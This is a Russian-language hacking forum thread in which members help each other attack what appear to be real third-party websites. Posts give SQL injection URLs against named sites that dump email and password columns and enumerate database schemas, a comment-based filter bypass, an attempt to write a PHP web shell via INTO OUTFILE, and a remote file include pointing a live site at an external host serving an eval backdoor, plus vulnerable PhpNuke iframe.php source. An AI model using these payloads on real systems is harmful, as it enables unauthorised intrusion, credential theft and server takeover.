Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Ulitko

    Ulitko New Member

    Joined:
    12 Aug 2011
    Messages:
    18
    Likes Received:
    1
    Reputations:
    0
    попробывал этот запрос. Выдает ошибку
    (Could not find stored procedure 'master..sp_makewebtask'.)
     
  2. wkar

    wkar Elder - Старейшина

    Joined:
    18 Oct 2009
    Messages:
    211
    Likes Received:
    67
    Reputations:
    34
    запрос +UNION+SELECT+1,`<? system($_GET[cmd]); ?>`,3+from+mysql.user+into+outfile+`0x2f746d702f31312e706870`--+
    в ответ ошибка supplied argument is not a valid MySQL result resource in
    Подскажите где она?
     
  3. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    users захекси..
     
    1 person likes this.
  4. Kuteke

    Kuteke Banned

    Joined:
    26 Jun 2010
    Messages:
    179
    Likes Received:
    26
    Reputations:
    6
    users хексни!
    0x7573657273
    http://steelmuscle.org/hex.php
     
  5. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    во первых получишь ошибку

    Unknown column '<? system($_GET[cmd]); ?>' in 'field list' (указывать надо в прямых ковычках)

    во вторых путь к файлу (После into outfile) надо указать в ковычках а не в ( `` )

    в третих нельзя захексить путь
     
    _________________________
    #17985 Konqi, 1 Oct 2011
    Last edited: 1 Oct 2011
    1 person likes this.
  6. Ulitko

    Ulitko New Member

    Joined:
    12 Aug 2011
    Messages:
    18
    Likes Received:
    1
    Reputations:
    0
    забыл добавить, пытаюсь сделать все из под шелла
     
  7. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605
    это шутка????from+0x7573657273

    http://www.sait.ru/comment.php?idart=-11364+union+%0A+select+1,2,concat_ws(0x3a,email,password),4,5,6+fr om+users+--+

    http://www.sait.ru/comment.php?idart=-11364+union+%0A+select+1,2,column_name,4,5,6+fr om+information_schema.columns+where+table_name=0x7573657273+--+


    как то так что бы тебе понятнее было что ты пытаешься сделать
     
    _________________________
    #17987 HAXTA4OK, 1 Oct 2011
    Last edited: 1 Oct 2011
  8. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605
    http://www.sait.ru/comment.php?idart=-11364+union+%0A+select+1,2,email,password,4,5,6+fr om+0x7573657273-- в этом?????????
    в этом запросе он теб не покажет ни какие имайлы и пароли, чуть выше я тебе показал более менее рабочий запрос
     
    _________________________
  9. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,414
    Likes Received:
    911
    Reputations:
    863
    concat_ws() выводит в одном выводимом поле несколько значений которые определяются первыми символами до запятой, а все после запросы будут выводиться разделяясь первыми символами.
     
    _________________________
  10. vaddd

    vaddd Member

    Joined:
    6 Jan 2009
    Messages:
    140
    Likes Received:
    19
    Reputations:
    9
    узнать ее имя, и составлять запросы типа:

    SELECT column from database2.table
     
  11. d1v

    d1v Elder - Старейшина

    Joined:
    21 Feb 2009
    Messages:
    676
    Likes Received:
    331
    Reputations:
    120
    нет там больше баз.
    http://www.chelsi.ru/comment.php?idart=-11364+union+%0A+select+1,2,schema_name,4,5,6+from+information_schema.schemata
    чел, ответы на ВСЕ свои вопросы, заданные в этой теме ты легко можешь найти в поиске или в манах, например в том, ссылку на который я запостил выше. а разжевать всё и положить в ротик, означает создать новый поток тупых вопросов.
     
  12. Bmen

    Bmen New Member

    Joined:
    14 Aug 2011
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Привет!
    Проблема вот в чём, на сервере наверно сайт фильтр. Когда делаю запрос - http://www.adlucem.info/?sadala=-15+union+select+1,2,3,4,5,6,7,8,9--
    появляется Not Acceptable 406 и так на всех сайтах на серверы где есть ошибка. Как можно это обойти?

    Спасибо за внимание!
     
  13. Melfis

    Melfis Elder - Старейшина

    Joined:
    25 Apr 2011
    Messages:
    505
    Likes Received:
    105
    Reputations:
    53
    http://www.adlucem.info/?sadala=-15+union+/*!select*/+1,2,3,4,5,6,7,8,9--+
     
    1 person likes this.
  14. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    http://www.adlucem.info/?sadala=-15+/*!union*/+select+1,2,3,4,5,6,7,8,version()--+
     
  15. dimm666

    dimm666 New Member

    Joined:
    29 Mar 2010
    Messages:
    16
    Likes Received:
    2
    Reputations:
    5
    Всем доброго дня. Можно ли как-то использовать
    http://www.kid.ru/forum/index.php?act=Members&max_results=30&filter=1&sort_order=asc&sort_key=name&st='
    ? Бился я долго, но проблема в LIMIT после ORDER BY.
     
  16. =Zeus=

    =Zeus= Member

    Joined:
    10 Aug 2009
    Messages:
    213
    Likes Received:
    54
    Reputations:
    5
    Привет. Пытаюсь приинклудить файл:
    http://www.vergaviagrande.it/iframe.php?file=http://serpov-alex.narod2.ru/1.txt
    В нем такое содержимое: <?php eval($_GET[e]);?>
    Но в результате содержимое файла тупо выводиться на экран. Я так понимаю что ничего не получиться. Но если сделать так:
    http://www.vergaviagrande.it/iframe.php?file=qwe
    То выведутся ошибки, точно такие, какие наводят во всех статьях про пхп-инклуды.
    Собственно вопрос: что я не так делаю?
     
  17. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    имя скрипта должно тебе подсказывать что там не инклуд, файлы открываются в фрейме
     
    _________________________
  18. =Zeus=

    =Zeus= Member

    Joined:
    10 Aug 2009
    Messages:
    213
    Likes Received:
    54
    Reputations:
    5
    * Facepalm * :rolleyes:

    Спасибо ))
     
  19. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    =Zeus=

    инклуд тоже есть, но локальный :)

    просто скрипт хуего написано, заблуждает

    логика такая, если в имени файла есть http:// то файл открывается в фрейме, если имя файла локальное, то инклудится

    (во всяком случий я так понял)
     
    _________________________
    #17999 Konqi, 2 Oct 2011
    Last edited: 2 Oct 2011
  20. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    iframe.php

    PHP:

    <?php



    /************************************************************************/

    /* iFRAME for PhpNuke

    /* Copyright (c) 2002 by Xavi Gil ([email protected]

    /* http://www.desarrollonuke.org

    /*

    /* USE: iframe.php?file=URL

    /* 

    /* This program is free software. You can redistribute it and/or modify

    /* it under the terms of the GNU General Public License as published by

    /* the Free Software Foundation; either version 2 of the License.

    /************************************************************************/





    if (!isset($mainfile)) { include("mainfile.php"); }





    $index 0;

    $height 600;





    include(
    "header.php"); 

    OpenTable();

        if( 
    substr($file,0,5)!="./../" && substr($file,0,7)!="http://" ){

              include (
    $file);

              
    CloseTable();

            include(
    "footer.php");

        }

        else {

            echo 
    "<IFRAME src=\"$file\" width=\"100%\" height=\"$height\" scrolling=\"auto\" frameborder=\"0\">";

            echo 
    "</IFRAME><center><hr size=\"1\" noshade><a href=\"$file\" target=\"_blank\">$file</a></center>";

            
    CloseTable();

            include(
    "footer.php");



        }

    ?>

    говорил же, :D
     
    _________________________
    #18000 Konqi, 2 Oct 2011
    Last edited: 2 Oct 2011
    1 person likes this.
Thread Status:
Not open for further replies.